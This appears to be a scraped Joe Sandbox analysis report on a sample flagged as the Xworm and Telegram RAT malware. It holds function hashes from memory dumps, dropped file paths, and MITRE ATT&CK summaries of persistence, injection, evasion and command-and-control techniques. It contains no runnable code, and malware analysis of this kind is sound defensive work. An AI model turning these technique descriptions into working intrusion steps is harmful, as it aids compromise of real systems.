Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID: <P_^
API String ID: 0-1190497245
Opcode ID: a181f75c88959b73dbdc1cf2e440431762a49f7a197d1df09af192366db26ae5
Instruction ID: d3b708d75b9e0d74e63f4ab56576ff7650ad77b964d216e59ff8b295efefe1a7
Opcode Fuzzy Hash: a181f75c88959b73dbdc1cf2e440431762a49f7a197d1df09af192366db26ae5
Instruction Fuzzy Hash: 0E5158A165854A5FE304F73CD0569FABBA1EFC932078041F6D44DC3397EE25E80A839A

Function 00007FFAACCA0588 Relevance: 1.4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

r6, xrefs: 00007FFAACCA2292

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: 037a58f4e91ab51afb850beac4be5b4af1aae0d9d4c29f5460c2b0bb08fa6388
Instruction ID: 1a4801eadce3bb1d24f6cf1ad7eddae7f85e482952384178fe9c20b465db82cf
Opcode Fuzzy Hash: 037a58f4e91ab51afb850beac4be5b4af1aae0d9d4c29f5460c2b0bb08fa6388
Instruction Fuzzy Hash: 8531C661B1C9494FE798EB7CD46A679BBC6EF9D310F0405B9E04EC3293ED289C468381

Function 00007FFAACCA0B31 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

6, xrefs: 00007FFAACCA0B62

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID: 6
API String ID: 0-1452363761
Opcode ID: 04dc1705355d4e0d6729559b31fb9d007226d176e63216a5675272c38829583b
Instruction ID: b779b6e7fb4f257083bc49864e8394f089ab87e1f5ebca73f0a0455122da3cff
Opcode Fuzzy Hash: 04dc1705355d4e0d6729559b31fb9d007226d176e63216a5675272c38829583b
Instruction Fuzzy Hash: 2D31C7A1A18A499FF784BBB8981E7BC76D6EF99741F0441BAE40DC3193DE28D8058381

Function 00007FFAACCA1729 Relevance: .3, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e9718f38b487070902f5a83eee36a9346764e30fc29da718aa74e8c40dfd15
Instruction ID: efec0a4525072af1e6bad048c49f3c0bcb8e84bcc4c5068031560af58cddb949
Opcode Fuzzy Hash: 54e9718f38b487070902f5a83eee36a9346764e30fc29da718aa74e8c40dfd15
Instruction Fuzzy Hash: DD919565A259499FEB98FB78D45D6BC7792FF89350B804478E80FC32C2EE29DC058744

Function 00007FFAACCA0C9E Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d69e34994b7ffd66053af70efdce62082c28dc70e0aec2c66f7efe2a36246ec3
Instruction ID: 075acc81b4c406396c8f8a5a7fd6807c5325ec614f955bc0ff961ab1b0524fa5
Opcode Fuzzy Hash: d69e34994b7ffd66053af70efdce62082c28dc70e0aec2c66f7efe2a36246ec3
Instruction Fuzzy Hash: 8E514B62A0E6C65FE357E738985A5757FE2EF87250B0840FBD08DC7193DD18AC468392

Function 00007FFAACCA09E1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02debe2d6c90186d226482b715c1c68a8e3910e692b0ddd67a1263bff2a26dc1
Instruction ID: 64685dfda7e652cb3c99ef2e206196504e761877f1b88bd91c49e5d461a6531f
Opcode Fuzzy Hash: 02debe2d6c90186d226482b715c1c68a8e3910e692b0ddd67a1263bff2a26dc1
Instruction Fuzzy Hash: 2431C5B1A18A498FEB44EB78C4597FDB7A2FF98310F5045B5D00DD3282DE38E8418781

Function 00007FFAACCA2381 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6535836ee5cc0063260c72952d12981d91893661aae7ecb266716f08da5f1c19
Instruction ID: dfb7f39676141ce00efa1a8561031552a8a6fcfa6eade57cc359ed65075cf728
Opcode Fuzzy Hash: 6535836ee5cc0063260c72952d12981d91893661aae7ecb266716f08da5f1c19
Instruction Fuzzy Hash: 11113611A0E6954FF344AB3CA8095717BE1DF97321B0805B7E88CC60A2E814DD8583C1

Function 00007FFAACCA1648 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72446fa73109f893df3429ae862eff37a8d8981340b83d7284e7530624e055ed
Instruction ID: 6b045f900b8afa23693bef5d369b6a69dee30e9af729bbc94225bfbce2fde295
Opcode Fuzzy Hash: 72446fa73109f893df3429ae862eff37a8d8981340b83d7284e7530624e055ed
Instruction Fuzzy Hash: 17115172D2480ECFE744EB98D85A5FDBBB2EF89210F804176D01EE71E5DE2598468784

Non-executed Functions

Function 00007FFAACCA06FA Relevance: 7.6, Strings: 6, Instructions: 118COMMON

Download Yara Rule

Strings

P_^|, xrefs: 00007FFAACCA0772
P_^^, xrefs: 00007FFAACCA06FA
P_^j, xrefs: 00007FFAACCA072A
P_^h, xrefs: 00007FFAACCA0722
P_^~, xrefs: 00007FFAACCA077A
=P_^, xrefs: 00007FFAACCA0701

Memory Dump Source

Source File: 0000001C.00000002.2015778793.00007FFAACCA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_7ffaacca0000_0720XW.jbxd

Similarity

API ID:
String ID: =P_^$P_^^$P_^h$P_^j$P_^|$P_^~
API String ID: 0-43531156
Opcode ID: f144888e7b4dfefb32483008a6e865d8c26dcf50b58e61d17753d01bcdd79997
Instruction ID: f5bf4ceff8b3e7d507a1589c79958beaf2355202cee578bc41c0fcd1c2b2a491
Opcode Fuzzy Hash: f144888e7b4dfefb32483008a6e865d8c26dcf50b58e61d17753d01bcdd79997
Instruction Fuzzy Hash: 00312BE790D4265EF20177FCB885AEC2B8A9F807B47894672D0DDCA0C7CF68748A45D9

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Or3dzp4vB1.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Telegram RAT

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\0720XW.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Log.tmp

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05yyfy53.db4.ps1

Windows Analysis Report
Or3dzp4vB1.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre